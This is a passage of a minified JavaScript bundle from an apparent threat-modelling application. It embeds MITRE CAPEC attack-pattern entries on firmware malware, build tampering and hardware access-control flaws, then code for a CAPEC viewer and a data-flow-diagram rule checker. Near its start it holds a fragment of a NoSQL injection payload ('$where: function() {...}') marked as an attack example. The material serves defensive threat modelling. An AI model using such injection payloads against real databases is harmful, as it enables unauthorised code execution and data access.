);",{"style":"margin-left:10px;"}]},"$where: function() { //arbitrary JavaScript here }",{"style":"margin-left:10px;","class":"attack"}]}]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"943"},{"CWE_ID":"1286"}]},"References":{"Reference":[{"External_Reference_ID":"REF-668"},{"External_Reference_ID":"REF-669"},{"External_Reference_ID":"REF-670"},{"External_Reference_ID":"REF-671"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2021-10-21"}}},"677":{"ID":"677","Name":"Server Functionality Compromise","Abstraction":"Detailed","Status":"Draft","Description":{"p":"Malware is inserted in a server motherboard (e.g., in the flash memory) in order to alter server functionality from that intended. The development environment or hardware/software support activity environment is susceptible to an adversary inserting malicious software into hardware components during development or update."},"Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"534"}},"Prerequisites":{"Prerequisite":"An adversary with access to hardware/software processes and tools within the development or hardware/software support environment can insert malicious software into hardware components during development or update/maintenance."},"Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Execute Unauthorized Commands"}},"Mitigations":{"Mitigation":["Purchase IT systems, components and parts from government approved vendors whenever possible.","Establish diversity among suppliers.","Conduct rigorous threat assessments of suppliers.","Require that Bills of Material (BoM) for critical parts and components be certified.","Utilize contract language requiring contractors and subcontractors to flow down to subcontractors and suppliers SCRM and SCRA (Supply Chain Risk Assessment) requirements.","Establish trusted supplier networks."]},"Example_Instances":{"Example":{"p":"Malware is inserted into the Unified Extensible Firmware Interface (UEFI) software that resides on a flash memory chip soldered to a computer\u2019s motherboard. It is the first thing to turn on when a system is booted and is allowed access to almost every part of the operating system. Hence, the malware will have extensive control over operating system functions and persist after system reboots. [REF-685]"}},"References":{"Reference":[{"External_Reference_ID":"REF-439"},{"External_Reference_ID":"REF-660"},{"External_Reference_ID":"REF-685"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2021-10-21"}}},"678":{"ID":"678","Name":"System Build Data Maliciously Altered","Abstraction":"Detailed","Status":"Draft","Description":{"p":"During the system build process, the system is deliberately misconfigured by the alteration of the build data. Access to system configuration data files and build processes are susceptible to deliberate misconfiguration of the system."},"Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"444"}},"Prerequisites":{"Prerequisite":"An adversary has access to the data files and processes used for executing system configuration and performing the build."},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Execute Unauthorized Commands"},{"Scope":"Access Control","Impact":"Gain Privileges"},{"Scope":"Confidentiality","Impact":["Modify Data","Read Data"]}]},"Mitigations":{"Mitigation":["Implement configuration management security practices that protect the integrity of software and associated data.","Monitor and control access to the configuration management system.","Harden centralized repositories against attack.","Establish acceptance criteria for configuration management check-in to assure integrity.","Plan for and audit the security of configuration management administration processes.","Maintain configuration control over operational systems."]},"Example_Instances":{"Example":{"p":"\u2018Make\u2019 is a program used for building executable programs and libraries from source code by executing commands and following rules in a \u2018makefile\u2019. It can create a malicious executable if commands or dependency paths in the makefile are maliciously altered to execute an unwanted command or reference as a dependency maliciously altered code."}},"References":{"Reference":[{"External_Reference_ID":"REF-439"},{"External_Reference_ID":"REF-660"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2021-10-21"}}},"679":{"ID":"679","Name":"Exploitation of Improperly Configured or Implemented Memory Protections","Abstraction":"Detailed","Status":"Draft","Description":{"p":"An adversary takes advantage of missing or incorrectly configured access control within memory to read/write data or inject malicious code into said memory."},"Extended_Description":{"p":"Hardware product designs often need to implement memory protection features to prevent users from reading and modifying memory reserved for security operations such as secure booting, authenticating code, device attestation, and more. However, these protection features may be missing if not configured by developers. For example, this can occur if the developers assume these features are configured elsewhere. Additionally, developers often attempt to impose proper protection features, but may incorrectly configure these controls. One such example would be setting controls with insufficient granularity for protected address regions. If an adversary is able to discover improper access controls surrounding memory, it could result in the adversary obtaining sensitive data, executing code, circumventing security mechanisms, escalating privileges, or even denying service to higher privilege software."},"Likelihood_Of_Attack":"Medium","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"1","Exclude_Related":{"Exclude_ID":"513"}},{"Nature":"ChildOf","CAPEC_ID":"180","Exclude_Related":{"Exclude_ID":"513"}}]},"Prerequisites":{"Prerequisite":"Access to the hardware being leveraged."},"Skills_Required":{"Skill":["Ability to craft malicious code to inject into the memory region.",{"Level":"Medium"},"Intricate knowledge of memory structures.",{"Level":"High"}]},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}]},"Mitigations":{"Mitigation":["Ensure that protected and unprotected memory ranges are isolated and do not overlap.","If memory regions must overlap, leverage memory priority schemes if memory regions can overlap.","Ensure that original and mirrored memory regions apply the same protections.","Ensure immutable code or data is programmed into ROM or write-once memory."]},"Example_Instances":{"Example":[{"p":"A hardware product contains non-volatile memory, which itself contains boot code that is insufficiently protected. An adversary then modifies this memory to either bypass the secure boot process or to execute their own code."},{"p":"A hardware product leverages a CPU that does not possess a memory-protection unit (MPU) and a memory-management unit (MMU) nor a special bit to support write exclusivity, resulting in no write exclusivity. Because of this, an adversary is able to inject malicious code into the memory and later execute it to achieve the desired outcome."}]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"1222"},{"CWE_ID":"1252"},{"CWE_ID":"1257"},{"CWE_ID":"1260"},{"CWE_ID":"1274"},{"CWE_ID":"1282"},{"CWE_ID":"1312"},{"CWE_ID":"1316"},{"CWE_ID":"1326"}]},"References":{"Reference":[{"External_Reference_ID":"REF-687"},{"External_Reference_ID":"REF-668"},{"External_Reference_ID":"REF-689"},{"External_Reference_ID":"REF-690"},{"External_Reference_ID":"REF-691"},{"External_Reference_ID":"REF-692"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2021-10-21"}}},"680":{"ID":"680","Name":"Exploitation of Improperly Controlled Registers","Abstraction":"Detailed","Status":"Draft","Description":{"p":"An adversary exploits missing or incorrectly configured access control within registers to read/write data that is not meant to be obtained or modified by a user."},"Extended_Description":{"p":"Hardware systems often utilize trusted lock bits to prevent a set of registers from being written to or to restrict a register to only being written to once. Registers are also frequently used to store sensitive data leveraged in additional security operations, such as secure booting, authenticating code, device attestation, and more. However, the access control mechanisms meant to protect these registers may be fully missing or ineffective due to misconfiguration. If an adversary is able to discover improper access controls surrounding registers, it could result in the adversary obtaining sensitive data and/or modifying data that is meant to be immutable. This can ultimately result in processes like secure boot being circumvented or in protected configurations being modified."},"Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"1","Exclude_Related":{"Exclude_ID":"513"}},{"Nature":"ChildOf","CAPEC_ID":"180","Exclude_Related":{"Exclude_ID":"513"}}]},"Prerequisites":{"Prerequisite":["Awareness of the hardware being leveraged.","Access to the hardware being leveraged."]},"Skills_Required":{"Skill":["Intricate knowledge of registers.",{"Level":"High"}]},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"}]},"Mitigations":{"Mitigation":["Design proper access control policies for hardware register access from software and ensure these policies are implemented in accordance with the specified design.","Ensure security lock bit protections are reviewed for design inconsistencies and common weaknesses.","Test security lock programming flow in both pre-silicon and post-silicon environments.","Leverage automated tools to test that values are not reprogrammable and that write-once fields lock on writing zeros.","Ensure that measurement data is stored in registers that are read-only or otherwise have access controls that prevent modification by an untrusted agent."]},"Example_Instances":{"Example":{"p":"During a System-on-Chip\'s (SoC) secure boot process, the code to be authenticated is measured to determine the code\'s validity. This entails the one-way hash of the code binary being calculated and extended to the previous hash. The value obtained after completion of the boot flow is then stored in a register with the intent of later verifying this value to determine if the boot flow has been tampered with. However, the register being used does not prevent an adversary from modifying the register\'s contents, which can result in the adversary spoofing the measurement data used in the attestation process."}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"1224"},{"CWE_ID":"1231"},{"CWE_ID":"1233"},{"CWE_ID":"1262"},{"CWE_ID":"1283"}]},"References":{"Reference":{"External_Reference_ID":"REF-693"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2021-10-21"}}},"681":{"ID":"681","Name":"Exploitation of Improperly Controlled Hardware Security Identifiers","Abstraction":"Detailed","Status":"Draft","Description":{"p":"An adversary takes advantage of missing or incorrectly configured security identifiers (e.g., tokens), which are used for access control within a System-on-Chip (SoC), to read/write data or execute a given action."},"Extended_Description":{"p":["A System-on-Chip (SoC) often implements a security identifier mechanism to differentiate what actions are allowed or disallowed when a transaction originates from an entity. However, these mechanisms may be exploitable due to any number of the following:","If the security identifiers leveraged by the SoC are missing or misconfigured, an adversary may be able to take advantage of this shortcoming to circumvent the intended access controls. This could result in the adversary gaining unintended access, performing a Denial of Service (DoS), escalating privileges, or spoofing actions from a trusted agent."],"ul":{"li":["The security identifiers are missing","The security identifiers are incorrectly implemented or generated","The security identifiers are generated with an obsolete encoding","The security identifiers are generated and implemented correctly, but are improperly protected"]}},"Likelihood_Of_Attack":"Medium","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"1","Exclude_Related":{"Exclude_ID":"513"}},{"Nature":"ChildOf","CAPEC_ID":"180","Exclude_Related":{"Exclude_ID":"513"}}]},"Prerequisites":{"Prerequisite":["Awareness of the hardware being leveraged.","Access to the hardware being leveraged."]},"Skills_Required":{"Skill":["Ability to execute actions within the SoC.",{"Level":"Medium"},"Intricate knowledge of the identifiers being utilized.",{"Level":"High"}]},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}]},"Mitigations":{"Mitigation":["Review generation of security identifiers for design inconsistencies and common weaknesses.","Review security identifier decoders for design inconsistencies and common weaknesses.","Test security identifier definition, access, and programming flow in both pre-silicon and post-silicon environments."]},"Example_Instances":{"Example":{"p":"A system contains a register (divided into four 32-bit registers) that is used to store a 128-bit AES key for encryption/decryption, in addition to an access-policy register. The access-policy register determines which agents may access the AES-key registers, based on a corresponding security identifier. It is assumed the system has two agents: a Main-controller and an Aux-controller, with respective security identifiers \\"1\\" and \\"2\\". The Main-controller (ID \\"1\\") is meant to have access to the AES-key registers, while the Aux-controller (ID \\"2\\") has access to the access-policy register. If a SoC incorrectly generates security identifier \\"1\\" for both agents, then both agents will have access to the AES-key registers. This could further result in a Denial-of-Service (DoS) or the execution of an action that in turn could result in privilege escalation or unintended access."}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"1259"},{"CWE_ID":"1267"},{"CWE_ID":"1270"},{"CWE_ID":"1294"},{"CWE_ID":"1302"}]},"References":{"Reference":[{"External_Reference_ID":"REF-694"},{"External_Reference_ID":"REF-695"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2021-10-21"}}},"Name":"VIEW LIST: CAPEC-1000: Mechanisms of Attack","Version":"3.6","Date":"2021-10-21"}');function Vpt(t,a){if(1&t){const e=Ye();m(0,"div",1),s(1,"\n  "),m(2,"mat-form-field",2),s(3,"\n    "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n    "),it(8,"input",3),s(9,"\n  "),u(),s(10,"\n  "),m(11,"mat-form-field",4),s(12,"\n    "),m(13,"mat-label"),s(14),oe(15,"translate"),u(),s(16,"\n    "),it(17,"input",3),s(18,"\n  "),u(),s(19,"\n  "),m(20,"mat-form-field",4),s(21,"\n    "),m(22,"mat-label"),s(23),oe(24,"translate"),u(),s(25,"\n    "),it(26,"input",3),s(27,"\n  "),u(),s(28,"\n  "),m(29,"button",5),he("click",function(){return be(e),Me(B().OpenCAPEC())}),oe(30,"translate"),s(31,"\n    "),m(32,"mat-icon"),s(33,"open_in_new"),u(),s(34,"\n  "),u(),s(35,"\n  "),m(36,"mat-form-field",6),s(37,"\n    "),m(38,"mat-label"),s(39),oe(40,"translate"),u(),s(41,"\n    "),it(42,"textarea",7),s(43,"\n  "),u(),s(44,"\n"),u()}if(2&t){const e=B();C(5),ke(re(6,13,"properties.CAPECTitle")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("value",e.GetCAPECTitle()),C(6),ke(re(15,15,"properties.likelihoodOfAttack")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("value",e.GetCAPECProperty("Likelihood_Of_Attack")),C(6),ke(re(24,17,"properties.typicalSeverity")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("value",e.GetCAPECProperty("Typical_Severity")),C(3),at("matTooltip",re(30,19,"general.openInNew")),C(10),ke(re(40,21,"properties.Description")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("value",e.GetCAPECProperty("Description"))}}let wZ=(()=>{class t{constructor(e){this.dataService=e}ngOnInit(){this.capecID||console.error("Unset capecID")}OpenCAPEC(){window.open(t.GetURL(this.capecID),"_blank")}GetCAPECTitle(){return t.GetCAPEDEntry(this.capecID)?"CAPEC-"+$p[this.capecID].ID+": "+$p[this.capecID].Name+" ("+$p[this.capecID].Status+")":null}GetCAPECProperty(e){if(!t.GetCAPEDEntry(this.capecID))return null;let i=t.GetCAPEDEntry(this.capecID)[e];return null==i?"":"object"==typeof i&&null!==i&&null!=i.p?"[object Array]"===Object.prototype.toString.call(i.p)?i.p.join("\n"):i.p:i}GetCAPECConsequences(){return t.GetCAPEDEntry(this.capecID)&&$p[this.capecID].Common_Consequences?Array.isArray($p[this.capecID].Common_Consequences.Consequence)?$p[this.capecID].Common_Consequences.Consequence:[$p[this.capecID].Common_Consequences.Consequence]:null}GetValues(e,i){return Array.isArray(e)?e.join(i?"; ":"\n"):e}static GetCAPEDEntry(e){return $p[e]}static GetURL(e){return"https://capec.mitre.org/data/definitions/"+e.toString()+".html"}}return t.\u0275fac=function(e){return new(e||t)(Ee(Yi))},t.\u0275cmp=Wt({type:t,selectors:[["app-capec-entry"]],inputs:{capecID:"capecID"},decls:1,vars:1,consts:[["style","pointer-events: none;",4,"ngIf"],[2,"pointer-events","none"],["appearance","fill",2,"width","calc(100% - 455px)","margin-right","5px"],["matInput","","type","text",3,"spellcheck","value"],["appearance","fill",2,"width","200px","margin-right","5px"],["mat-icon-button","","matTooltipShowDelay","1000",2,"vertical-align","super","pointer-events","all",3,"matTooltip","click"],["appearance","fill",2,"width","100%"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5","cdkTextareaAutosize","",3,"spellcheck","value"]],template:function(e,i){1&e&&ne(0,Vpt,45,23,"div",0),2&e&&V("ngIf",i.capecID)},dependencies:[Ri,oa,da,nn,un,Go,Xa,Pa,Xi]}),t})(),S7=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[rn,pf,Fpt]}),t})();Ds(Gp,[Zi,Ri,pm,_m,an,Ac,Td,Ta,Ed,Ea,Rd,Sd,oa,br,da,nn,un,mF,jr,Nr,yr,Cg,Go,Xa,es,ts,Or,Lr,rc,_p,Xo,qo,po,Pa,tl,Ec,Dc,el,Il,Cp,Qg,T2],[Xi]),Ds(Qg,[Zi,Ri,an,Ac,Ta,Ea,Rd,Sd,oa,br,da,nn,un,jr,Nr,yr,Cg,Go,Xa,qF,HF,UF,es,ts,Or,Lr,rc,Xo,qo,po,Pa,tl,Ec,Dc,el,Il,Cp,N5,wZ,Wm,Gp,T2],[Xi]),Ds(T2,[Zi,Ri,an,Ta,Ea,Rd,Sd,oa,br,da,nn,un,jr,Nr,yr,Cg,Go,Xa,es,ts,Or,Lr,rc,Pa,tl,Ec,Dc,el,Il,Cp,Gp,Qg],[Xi]);var Fm=(()=>{return(t=Fm||(Fm={}))[t.AtLeastOneDF=1]="AtLeastOneDF",t[t.DFconnectsP=2]="DFconnectsP",t[t.TooManyProcesses=3]="TooManyProcesses",t[t.IFNotUsed=101]="IFNotUsed",Fm;var t})(),Fu=(()=>{return(t=Fu||(Fu={}))[t.Info=1]="Info",t[t.Warning=2]="Warning",t[t.Error=3]="Error",Fu;var t})();let Bpt=(()=>{class t{constructor(e){this.dataService=e}CheckDFDRules(e){if(!e.Elements)return[];let i=[];return e.DiagramType==xn.DataFlow?(i.push(...this.checkRule1(e)),i.push(...this.checkRule2(e)),i.push(...this.checkRule3(e))):i.push(...this.checkRule101(e)),i}checkRule1(e){let i=[],n=e.Elements.GetChildrenFlat(),r=n.filter(d=>[Et.LogExternalEntity,Et.PhyExternalEntity,Et.LogDataStore,Et.LogProcessing,Et.PhysicalLink].includes(d.Type.ElementTypeID));return n.filter(d=>d.Type.ElementTypeID==Et.DataFlow).forEach(d=>{if(d.Sender){let T=r.findIndex(k=>k.ID==d.Sender.ID);r.splice(T,1)}if(d.Receiver){let T=r.findIndex(k=>k.ID==d.Receiver.ID);r.splice(T,1)}}),r.forEach(d=>i.push({DiagramID:e.ID,RuleType:Fm.AtLeastOneDF,Type:Fu.Warning,Element:d})),i}checkRule2(e){let i=[];return e.Elements.GetChildrenFlat().filter(c=>c.Type.ElementTypeID==Et.DataFlow).forEach(c=>{let d=!1,T=!0;c.Sender&&(d=c.Sender.Type.ElementTypeID==Et.LogProcessing,T=c.Sender.Type.ElementTypeID==Et.PhysicalLink),!d&&c.Receiver&&(d=c.Receiver.Type.ElementTypeID==Et.LogProcessing,T=T&&c.Receiver.Type.ElementTypeID==Et.PhysicalLink),!d&&!T&&i.push({DiagramID:e.ID,RuleType:Fm.DFconnectsP,Type:Fu.Warning,Element:c})}),i}checkRule3(e){let i=[];return e.Elements.GetChildrenFlat().filter(c=>c.Type.ElementTypeID==Et.LogProcessing).length>7&&i.push({DiagramID:e.ID,RuleType:Fm.TooManyProcesses,Type:Fu.Warning,Element:null}),i}checkRule101(e){let i=[],n=e.Elements.GetChildrenFlat().filter(c=>c.Type.ElementTypeID==Et.Interface),r=this.dataService.Project.GetDFDElements().filter(c=>c.Type.ElementTypeID==Et.DataFlow);return n.forEach(c=>{r.some(d=>{var T,k;return(null===(T=d.SenderInterface)||void 0===T?void 0:T.ID)==c.ID||(null===(k=d.ReceiverInterface)||void 0===k?void 0:k.ID)==c.ID})||i.push({DiagramID:e.ID,RuleType:Fm.IFNotUsed,Type:Fu.Info,Element:c})}),i}}return t.\u0275fac=function(e){return new(e||t)(At(Yi))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();function Hpt(t,a){1&t&&(m(0,"th",13),s(1," "),u())}function Upt(t,a){if(1&t&&(m(0,"td",14),s(1," "),m(2,"mat-icon"),s(3),u(),s(4," "),u()),2&t){const e=a.$implicit,i=B();C(3),ke(i.GetTypeIcon(e))}}function qpt(t,a){1&t&&(m(0,"th",15),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Issue")," "))}function Gpt(t,a){if(1&t&&(m(0,"td",14),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B();C(1),ct(" ",re(2,1,i.GetRule(e))," ")}}function jpt(t,a){1&t&&(m(0,"th",15),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Element")," "))}function Qpt(t,a){if(1&t&&(m(0,"td",14),s(1),u()),2&t){const e=a.$implicit;Ct("selected-cell",B().IsElementSelected(e)),C(1),ct(" ",null==e.Element?null:e.Element.Name," ")}}function $pt(t,a){1&t&&it(0,"tr",16)}function Kpt(t,a){if(1&t){const e=Ye();m(0,"tr",17),he("click",function(){const r=be(e).$implicit;return Me(B().SelectIssue(r))}),s(1,"\n      "),u()}if(2&t){const e=a.$implicit;Ct("selected-item",B().IsIssueSelected(e)),V("id",e.ID)}}function Xpt(t,a){1&t&&(m(0,"tr",18),s(1,"\n        "),m(2,"td",19),s(3),oe(4,"translate"),u(),s(5,"\n      "),u()),2&t&&(C(3),ke(re(4,1,"pages.modeling.issuetable.noIssues")))}let Ypt=(()=>{class t{constructor(e,i,n){this.theme=e,this.dataService=i,this.dfdCop=n,this.changesCounter=0,this.isCalculatingIssues=!1,this._issues=[],this.displayedColumns=[],this.selectedObjectChanged=new Tt,this.issueCountChanged=new Tt;let r=()=>{0==this.changesCounter?setTimeout(()=>{this.isCalculatingIssues=!0,this.changesCounter++},10):this.changesCounter++,setTimeout(()=>{this.changesCounter--,0==this.changesCounter&&this.RefreshIssues()},3e3)};this.dataService.Project&&setTimeout(()=>{var c;null===(c=this.dataService.Project)||void 0===c||c.DFDElementsChanged.subscribe(d=>r())},1e3)}get selectedIssue(){return this._selectedIssue}set selectedIssue(e){this._selectedIssue=e}set selectedNode(e){this._selectedNode=e,this.displayedColumns=["type","rule","element"],this.RefreshIssues()}get selectedObject(){return this._selectedObject}set selectedObject(e){var i;e&&(null===(i=this._selectedObject)||void 0===i?void 0:i.ID)==e.ID||(this._selectedObject=e)}set filteredObject(e){this._filteredObject=e,this.RefreshIssues()}get Issues(){return this._issues}set Issues(e){this._filteredObject&&(e=e.filter(i=>i.Element==this._filteredObject)),this._issues=e,this.dataSource=new Ld(e),this.dataSource.sort=this.sort,this.dataSource.sortingDataAccessor=(i,n)=>{var r;return"type"==n?i.Type:"rule"==n?i.RuleType:"element"==n?null===(r=i.Element)||void 0===r?void 0:r.Name:void console.error("Missing sorting header")},this.sort&&this.sort.sortChange.emit(this.sort)}ngOnInit(){}onKeyDown(e){var i;if(this.isActive&&"TEXTAREA"!=(null===(i=document.activeElement)||void 0===i?void 0:i.tagName)){if(this.selectedIssue){const n=(r,c)=>{this.SelectIssue(r[c]);const d=this.rows.find(T=>T.nativeElement.id===r[c].ID);null==d||d.nativeElement.scrollIntoView({block:"center",behavior:"smooth"})};if("ArrowDown"==e.key){const r=this.dataSource.sortData(this.dataSource.filteredData,this.sort),c=r.indexOf(this.selectedIssue);c<r.length-1&&n(r,c+1)}else if("ArrowUp"==e.key){const r=this.dataSource.sortData(this.dataSource.filteredData,this.sort),c=r.indexOf(this.selectedIssue);c>0&&n(r,c-1)}}["ArrowDown","ArrowUp"].includes(e.key)&&(e.preventDefault(),e.stopImmediatePropagation())}}RefreshIssues(){var e,i;null!==(e=this._selectedNode)&&void 0!==e&&e.data?(null===(i=this._selectedNode)||void 0===i?void 0:i.data)instanceof Bg&&(this.Issues=this.dfdCop.CheckDFDRules(this._selectedNode.data)):this.Issues=[],setTimeout(()=>{this.issueCountChanged.emit(this.Issues.length)},10),this.isCalculatingIssues=!1}SelectIssue(e){this.selectedIssue=e,e.Element&&this.selectedObjectChanged.emit(e.Element)}IsIssueSelected(e){return this.selectedIssue==e}IsElementSelected(e){return e&&this.selectedObject&&e.Element==this.selectedObject}GetRule(e){switch(e.RuleType){case Fm.AtLeastOneDF:return"pages.modeling.issuetable.atLeastOneDF";case Fm.DFconnectsP:return"pages.modeling.issuetable.DFconnectsP";case Fm.IFNotUsed:return"pages.modeling.issuetable.IFNotUsed";case Fm.TooManyProcesses:return"pages.modeling.issuetable.TooManyProcesses";default:return e.RuleType}}GetTypeIcon(e){return e.Type==Fu.Info?"info":e.Type==Fu.Warning?"warning":e.Type==Fu.Error?"error":void 0}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi),Ee(Bpt))},t.\u0275cmp=Wt({type:t,selectors:[["app-issue-table"]],viewQuery:function(e,i){if(1&e&&(Mi(il,5),Mi(xc,5,mi)),2&e){let n;Vt(n=Bt())&&(i.sort=n.first),Vt(n=Bt())&&(i.rows=n)}},hostBindings:function(e,i){1&e&&he("keydown",function(r){return i.onKeyDown(r)},0,Qc)},inputs:{isActive:"isActive",selectedNode:"selectedNode",selectedObject:"selectedObject",filteredObject:"filteredObject"},outputs:{selectedObjectChanged:"selectedObjectChanged",issueCountChanged:"issueCountChanged"},decls:35,vars:8,consts:[[2,"height","100%","display","grid","align-content","start"],[2,"overflow","auto"],["mat-table","","matSort","","matSortActive","type","matSortDirection","desc","matSortDisableClear","",2,"width","100%",3,"dataSource"],["matColumnDef","type"],["mat-header-cell","","mat-sort-header","","style","width: 34px;",4,"matHeaderCellDef"],["mat-cell","",4,"matCellDef"],["matColumnDef","rule"],["mat-header-cell","","mat-sort-header","",4,"matHeaderCellDef"],["matColumnDef","element"],["mat-cell","",3,"selected-cell",4,"matCellDef"],["mat-header-row","","style","height: 30px;",4,"matHeaderRowDef","matHeaderRowDefSticky"],["mat-row","",3,"id","selected-item","click",4,"matRowDef","matRowDefColumns"],["class","mat-row",4,"matNoDataRow"],["mat-header-cell","","mat-sort-header","",2,"width","34px"],["mat-cell",""],["mat-header-cell","","mat-sort-header",""],["mat-header-row","",2,"height","30px"],["mat-row","",3,"id","click"],[1,"mat-row"],["colspan","4",1,"mat-cell"]],template:function(e,i){1&e&&(m(0,"div",0),s(1,"\n  "),m(2,"div",1),s(3,"\n    "),m(4,"table",2),s(5,"\n      "),bt(6,3),s(7,"\n        "),ne(8,Hpt,2,0,"th",4),s(9,"\n        "),ne(10,Upt,5,1,"td",5),s(11,"\n      "),Mt(),s(12,"\n      "),bt(13,6),s(14,"\n        "),ne(15,qpt,3,3,"th",7),s(16,"\n        "),ne(17,Gpt,3,3,"td",5),s(18,"\n      "),Mt(),s(19,"\n      "),bt(20,8),s(21,"\n        "),ne(22,jpt,3,3,"th",7),s(23,"\n        "),ne(24,Qpt,2,3,"td",9),s(25,"\n      "),Mt(),s(26,"\n  \n      "),ne(27,$pt,1,0,"tr",10),s(28,"\n      "),ne(29,Kpt,2,3,"tr",11),s(30,"\n      "),ne(31,Xpt,6,3,"tr",12),s(32,"\n    "),u(),s(33,"\n  "),u(),s(34,"\n"),u()),2&e&&(C(4),Ct("bg-color-light3",!i.theme.IsDarkMode)("bg-color-dark3",i.theme.IsDarkMode),V("dataSource",i.dataSource),C(23),V("matHeaderRowDef",i.displayedColumns)("matHeaderRowDefSticky",!0),C(2),V("matRowDefColumns",i.displayedColumns))},dependencies:[oa,Au,Tu,jh,xm,Dm,Du,Eu,wm,Qh,xc,yp,il,Mp,Xi],styles:[".primary-color[_ngcontent-%COMP%], .selected-cell[_ngcontent-%COMP%], .selected-item[_ngcontent-%COMP%]   td[_ngcontent-%COMP%]{color:#2196f3!important}.primary-background[_ngcontent-%COMP%]{background-color:#2196f3!important}.bg-color-light1[_ngcontent-%COMP%], .splitter-light2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#e7e5e5!important}.bg-color-light2[_ngcontent-%COMP%]{background-color:#f5f5f5!important}.bg-color-light3[_ngcontent-%COMP%]{background-color:#fff!important}.bg-color-dark1[_ngcontent-%COMP%], .splitter-dark2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#333!important}.bg-color-dark2[_ngcontent-%COMP%]{background-color:#252525!important}.bg-color-dark3[_ngcontent-%COMP%]{background-color:#1e1e1e!important}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter{position:relative}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon{background-image:none!important;transition:opacity .3s;opacity:0;position:absolute}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover{opacity:1;background-color:#2196f3}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   